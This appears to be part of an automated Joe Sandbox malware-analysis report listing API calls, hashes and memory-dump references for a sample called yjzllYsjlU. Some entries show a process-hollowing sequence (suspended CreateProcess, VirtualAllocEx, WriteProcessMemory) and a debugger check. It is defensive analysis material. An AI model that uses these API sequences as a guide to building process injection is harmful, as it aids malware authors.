                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0052D066
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353337149.000000000052C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0052C000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_52c000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                    • Instruction ID: c7ea7a1216ee9cac0a17c8d068d52c405de6a70ee74ced36328a8ca69971ca04
                    • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                    • Instruction Fuzzy Hash: 3E113F79A00208EFDB01DF98C989E98BFF5AF08750F158094F9489B361D375EA50DF90
                    APIs
                    • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0041C76E
                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0041C77C
                    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0041C78D
                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0041C79E
                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0041C7AF
                    • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 0041C7C0
                    • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 0041C7D1
                    • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 0041C7E2
                    • GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 0041C7F3
                    • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 0041C804
                    • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0041C815
                    • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 0041C826
                    • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 0041C837
                    • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 0041C848
                    • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 0041C859
                    • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 0041C86A
                    • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0041C87B
                    • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0041C88C
                    • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 0041C89D
                    • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 0041C8AE
                    • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 0041C8BF
                    • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 0041C8D0
                    • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 0041C8E1
                    • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 0041C8F2
                    • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 0041C903
                    • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 0041C914
                    • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0041C925
                    • GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 0041C936
                    • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0041C947
                    • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0041C958
                    • GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 0041C969
                    • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0041C97A
                    • GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 0041C98B
                    • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0041C99C
                    • GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 0041C9AD
                    • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 0041C9BE
                    • GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 0041C9CF
                    • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 0041C9E0
                    • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 0041C9F1
                    • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 0041CA02
                    • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 0041CA13
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$HandleModule
                    • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                    • API String ID: 667068680-295688737
                    • Opcode ID: 7095254045faed2553d93f0c9490efac9b80fc04d73eb81a88eda45e0edda8b1
                    • Instruction ID: b27cf2173bd35c32a824bf4ef6feeb97883ccbcf9f0634586d8c00e0a98c48d7
                    • Opcode Fuzzy Hash: 7095254045faed2553d93f0c9490efac9b80fc04d73eb81a88eda45e0edda8b1
                    • Instruction Fuzzy Hash: A5612A75952710EBD7016FB4BC4DF893AB8EA09B93B608537F905D21B2E6F88104CB6D
                    APIs
                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004070CD
                    • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0040712B
                    • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00407144
                    • GetThreadContext.KERNEL32(?,00000000), ref: 00407159
                    • ReadProcessMemory.KERNEL32(?, ,?,00000004,00000000), ref: 00407179
                    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 004071BB
                    • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 004071D8
                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00407291
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: ProcessVirtual$AllocMemory$ContextCreateFileFreeModuleNameReadThreadWrite
                    • String ID: $VUUU$invalid stoi argument
                    • API String ID: 3796053839-3954507777
                    • Opcode ID: 27f6c6112b243df7e53398a743d978e592acbef08456db8e92c72c1a99b34ae4
                    • Instruction ID: 38b2a2fa096ae382cc622da32822fc99d79a3e7951b2d8ee4b07a12606b8df86
                    • Opcode Fuzzy Hash: 27f6c6112b243df7e53398a743d978e592acbef08456db8e92c72c1a99b34ae4
                    • Instruction Fuzzy Hash: 59418D74644301BFE7609F50DC06FAA7BE8BF88B05F000529FA84E62D1D7B4E944CB9A
                    APIs
                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02187334
                    • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 02187392
                    • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 021873AB
                    • GetThreadContext.KERNEL32(?,00000000), ref: 021873C0
                    • ReadProcessMemory.KERNEL32(?,00458DF8,?,00000004,00000000), ref: 021873E0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$AllocContextCreateFileMemoryModuleNameReadThreadVirtual
                    • String ID: VUUU
                    • API String ID: 338953623-2040033107
                    • Opcode ID: 8d52878efc5f8f8a1e952e44b6c95f7c24c53631ccf418eeef8ebfb25720e601
                    • Instruction ID: 9a4936b257dca154bb4e65a21ae2e481380c801be0e489a1f35c663984525b36
                    • Opcode Fuzzy Hash: 8d52878efc5f8f8a1e952e44b6c95f7c24c53631ccf418eeef8ebfb25720e601
                    • Instruction Fuzzy Hash: 2251C275684340AFD710AB64DC45F9ABBF9BF84B05F104429FA44E62D1DBB0E904CF9A
                    APIs
                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00420F16
                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00420F62
                      • Part of subcall function 0042265D: Concurrency::details::GlobalCore::Initialize.LIBCONCRT ref: 00422750
                    • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00420FCE
                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00420FEA
                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 0042103E
                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 0042106B
                    • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 004210C1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$GlobalInitialize$Node::$AffinityManager::Resource$CleanupCore::FindGroupInformationRestriction::Topology
                    • String ID: (
                    • API String ID: 2943730970-3887548279
                    • Opcode ID: 4022e65b4033ba6d99f09e60be676279313672c4fcdd80b72ccf6c64c13963d5
                    • Instruction ID: d8c2f6391a379bc46cf5e5d5dc6ad3851f43131c5326ae158e38cbfcee68216d
                    • Opcode Fuzzy Hash: 4022e65b4033ba6d99f09e60be676279313672c4fcdd80b72ccf6c64c13963d5
                    • Instruction Fuzzy Hash: 89B18BB0A00625EFCB28CF58E980A7AB7F4FF48700F51416EE905AB751D374A981CB99
                    APIs
                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 021A117D
                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 021A11C9
                      • Part of subcall function 021A28C4: Concurrency::details::GlobalCore::Initialize.LIBCONCRT ref: 021A29B7
                    • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 021A1235
                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 021A1251
                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 021A12A5
                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 021A12D2
                    • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 021A1328
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$GlobalInitialize$Node::$AffinityManager::Resource$CleanupCore::FindGroupInformationRestriction::Topology
                    • String ID: (
                    • API String ID: 2943730970-3887548279
                    • Opcode ID: 97f5cfb5054145a50c69719e5e21d6391f3292fc1eddb95c28002738003bc8bd
                    • Instruction ID: c423225c811a0938e898962252fa427d4ea4bda510a6bd5ce42229cce8dedb5c
                    • Opcode Fuzzy Hash: 97f5cfb5054145a50c69719e5e21d6391f3292fc1eddb95c28002738003bc8bd
                    • Instruction Fuzzy Hash: 45B18EB4A40615AFDB18CF68D9A0B7EB7B5FF44714F14416AD809AB690D370F980CBA4
                    APIs
                      • Part of subcall function 00422CFC: Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00422D0F
                    • Concurrency::details::ResourceManager::PreProcessDynamicAllocationData.LIBCONCRT ref: 00421614
                      • Part of subcall function 00422E0F: Concurrency::details::ResourceManager::HandleBorrowedCores.LIBCONCRT ref: 00422E39
                      • Part of subcall function 00422E0F: Concurrency::details::ResourceManager::HandleSharedCores.LIBCONCRT ref: 00422EA8
                    • Concurrency::details::ResourceManager::IncreaseFullyLoadedSchedulerAllocations.LIBCMT ref: 00421746
                    • Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 004217A6
                    • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 004217B2
                    • Concurrency::details::ResourceManager::DistributeExclusiveCores.LIBCONCRT ref: 004217ED
                    • Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 0042180E
                    • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 0042181A
                    • Concurrency::details::ResourceManager::DistributeIdleCores.LIBCONCRT ref: 00421823
                    • Concurrency::details::ResourceManager::ResetGlobalAllocationData.LIBCMT ref: 0042183B
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::Manager::Resource$AllocationCores$Dynamic$AdjustCoreDataDistributeHandlePrepareReceiversTransfer$AllocationsBorrowedBuffersExclusiveFullyGlobalIdleIncreaseInitializeLoadedProcessResetSchedulerShared
                    • String ID:
                    • API String ID: 2508902052-0
                    • Opcode ID: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
                    • Instruction ID: 90d9306956e5cc9bb6704af0189ae29657119f80b0b7e1970bf61bc55afc2ad7
                    • Opcode Fuzzy Hash: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
                    • Instruction Fuzzy Hash: FA818C71F00225AFCB18DFA9D580A6EB7F1FF98304B6542AED405A7711CB74AD42CB88
                    APIs
                      • Part of subcall function 021A2F63: Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 021A2F76
                    • Concurrency::details::ResourceManager::PreProcessDynamicAllocationData.LIBCONCRT ref: 021A187B
                      • Part of subcall function 021A3076: Concurrency::details::ResourceManager::HandleBorrowedCores.LIBCONCRT ref: 021A30A0
                      • Part of subcall function 021A3076: Concurrency::details::ResourceManager::HandleSharedCores.LIBCONCRT ref: 021A310F
                    • Concurrency::details::ResourceManager::IncreaseFullyLoadedSchedulerAllocations.LIBCMT ref: 021A19AD
                    • Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 021A1A0D
                    • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 021A1A19
                    • Concurrency::details::ResourceManager::DistributeExclusiveCores.LIBCONCRT ref: 021A1A54
                    • Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 021A1A75
                    • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 021A1A81
                    • Concurrency::details::ResourceManager::DistributeIdleCores.LIBCONCRT ref: 021A1A8A
                    • Concurrency::details::ResourceManager::ResetGlobalAllocationData.LIBCMT ref: 021A1AA2
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::Manager::Resource$AllocationCores$Dynamic$AdjustCoreDataDistributeHandlePrepareReceiversTransfer$AllocationsBorrowedBuffersExclusiveFullyGlobalIdleIncreaseInitializeLoadedProcessResetSchedulerShared
                    • String ID:
                    • API String ID: 2508902052-0
                    • Opcode ID: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
                    • Instruction ID: 6945aca3c7d441000d6b93bc45ea8f6724518b9fe2059c553ae053ac905eaa47
                    • Opcode Fuzzy Hash: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
                    • Instruction Fuzzy Hash: 92813A79E40625AFCB18CFA8C5A0A6DB7B6FF48304F1545ADD45AAB701C770A942CB90
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$InformationTimeZone
                    • String ID: XgE
                    • API String ID: 597776487-2984570469
                    • Opcode ID: 2b6728d1d25a7a4dc5655f9f1937d483343b97d9f8a5c2cfc13cb8f05322008e
                    • Instruction ID: df7d7efe0813b1fc9665f027b9df2e4c66d539f3229410abaef311319f10ac1b
                    • Opcode Fuzzy Hash: 2b6728d1d25a7a4dc5655f9f1937d483343b97d9f8a5c2cfc13cb8f05322008e
                    • Instruction Fuzzy Hash: 4AC14B71900205ABFB10AF69CE517AFBBA9EF45354F9500AFF88097391E7B88E41C758
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: __floor_pentium4
                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                    • API String ID: 4168288129-2761157908
                    • Opcode ID: ce3e69247486671be022874f0fc313c548611864b1c6192d43177eab318c758e
                    • Instruction ID: 6746934c2724dc80c2da897f8f258f2c486a7fd656fecb76804e093dbfd1dcc1
                    • Opcode Fuzzy Hash: ce3e69247486671be022874f0fc313c548611864b1c6192d43177eab318c758e
                    • Instruction Fuzzy Hash: 44C23971E046288FEB25CE28DD407EAB7B5EB88745F1441EBD84DE7240E778AE818F45
                    APIs
                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0042EC81
                      • Part of subcall function 00428F2F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00428F50
                    • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 0042ECE7
                    • Concurrency::details::WorkItem::ResolveToken.LIBCONCRT ref: 0042ECFF
                    • Concurrency::details::WorkItem::BindTo.LIBCONCRT ref: 0042ED0C
                      • Part of subcall function 0042E7AF: Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 0042E7D7
                      • Part of subcall function 0042E7AF: Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 0042E86F
                      • Part of subcall function 0042E7AF: Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0042E879
                      • Part of subcall function 0042E7AF: Concurrency::location::_Assign.LIBCMT ref: 0042E8AD
                      • Part of subcall function 0042E7AF: Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0042E8B5
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Base::Context$Scheduler$EventInternalItem::ProcessorVirtualWork$ActiveAssignBindCommitConcurrency::location::_GroupPointsReclaimResolveRunnableSafeScheduleSegmentThrowTokenTraceTrigger
                    • String ID:
                    • API String ID: 2363638799-0
                    • Opcode ID: 61a48eb18c36016cf9376c863cf090d5461b458c764e45c256d8a2d92b022f72
                    • Instruction ID: 5e7ff754d2b343dc4c16742e0cc3e1cb9d27b644ec3e5e3051372794b2f11420
                    • Opcode Fuzzy Hash: 61a48eb18c36016cf9376c863cf090d5461b458c764e45c256d8a2d92b022f72
                    • Instruction Fuzzy Hash: 8051E335B10225EBCF14DF52D885BAEB771AF44314F5540AAE9027B392CB78AE02CB95
                    APIs
                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 021AEEE8
                      • Part of subcall function 021A9196: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 021A91B7
                    • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 021AEF4E
                    • Concurrency::details::WorkItem::ResolveToken.LIBCONCRT ref: 021AEF66
                    • Concurrency::details::WorkItem::BindTo.LIBCONCRT ref: 021AEF73
                      • Part of subcall function 021AEA16: Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 021AEA3E
                      • Part of subcall function 021AEA16: Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 021AEAD6
                      • Part of subcall function 021AEA16: Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 021AEAE0
                      • Part of subcall function 021AEA16: Concurrency::location::_Assign.LIBCMT ref: 021AEB14
                      • Part of subcall function 021AEA16: Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 021AEB1C
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Base::Context$Scheduler$EventInternalItem::ProcessorVirtualWork$ActiveAssignBindCommitConcurrency::location::_GroupPointsReclaimResolveRunnableSafeScheduleSegmentThrowTokenTraceTrigger
                    • String ID:
                    • API String ID: 2363638799-0
                    • Opcode ID: 61a48eb18c36016cf9376c863cf090d5461b458c764e45c256d8a2d92b022f72
                    • Instruction ID: 5cec9530efe646c7abefa7d6a9d5087fdae27e71c66a87996ff290de32e79494
                    • Opcode Fuzzy Hash: 61a48eb18c36016cf9376c863cf090d5461b458c764e45c256d8a2d92b022f72
                    • Instruction Fuzzy Hash: 59519039A40205AFCF18EF50C8A5BADB776EF44314F1540A9ED027B395CB31AE06CBA1
                    APIs
                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00436BA6
                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00436BB0
                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00436BBD
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                    • String ID:
                    • API String ID: 3906539128-0
                    • Opcode ID: 2eca57a45cd8ef25c7ed16031d4a9fd0f8fa1a06597ba881db52fdbbd8b3e27b
                    • Instruction ID: 1f0ad2aab0448583845f395018efff8d75f4c1db1d39540b3f2c6e774d71cf18
                    • Opcode Fuzzy Hash: 2eca57a45cd8ef25c7ed16031d4a9fd0f8fa1a06597ba881db52fdbbd8b3e27b
                    • Instruction Fuzzy Hash: 5D31C474901329ABCB21DF69DD897CDBBB4BF08314F5091EAE40CA7291E7749B818F49
                    APIs
                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 021B6E0D
                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 021B6E17
                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 021B6E24
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                    • String ID:
                    • API String ID: 3906539128-0
                    • Opcode ID: 2eca57a45cd8ef25c7ed16031d4a9fd0f8fa1a06597ba881db52fdbbd8b3e27b
                    • Instruction ID: 363dfc63eab1e78ba9718193599953034dd5b59f58d06dd04650a548571c99d3
                    • Opcode Fuzzy Hash: 2eca57a45cd8ef25c7ed16031d4a9fd0f8fa1a06597ba881db52fdbbd8b3e27b
                    • Instruction Fuzzy Hash: 7D31C274941328ABCF21DF64D8897DDBBB8BF18310F5041EAE41CA7260EB709B858F45
                    APIs
                    • GetCurrentProcess.KERNEL32(?,?,021B6791,?,?,?,?,?,021B78C8), ref: 021B67B4
                    • TerminateProcess.KERNEL32(00000000,?,021B6791,?,?,?,?,?,021B78C8), ref: 021B67BB
                    • ExitProcess.KERNEL32 ref: 021B67CD
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$CurrentExitTerminate
                    • String ID:
                    • API String ID: 1703294689-0
                    • Opcode ID: 04b207d0b889d00e4800d5972e07640bc64685a596502c952aa2fb778607a5b5
                    • Instruction ID: 845c86cbcc5e7e512369e30362f85d6e5466fb4e33609e4913ed9dcc74bb8ae9
                    • Opcode Fuzzy Hash: 04b207d0b889d00e4800d5972e07640bc64685a596502c952aa2fb778607a5b5
                    • Instruction Fuzzy Hash: AFE0B636050748AFCF126F54DD48A883B79EF50742F144824F80586931CB36D981CB45
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: .$GetProcAddress.$l
                    • API String ID: 0-2784972518
                    • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                    • Instruction ID: 12504da68fe851acd66978f1aff55e238d901a755d33189b1f9763ae4d0cf1d3
                    • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                    • Instruction Fuzzy Hash: 91314AB6940609DFDB10DF99C880AAEBBF9FF48324F15414AD845A7310D7B1EA49CFA4
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
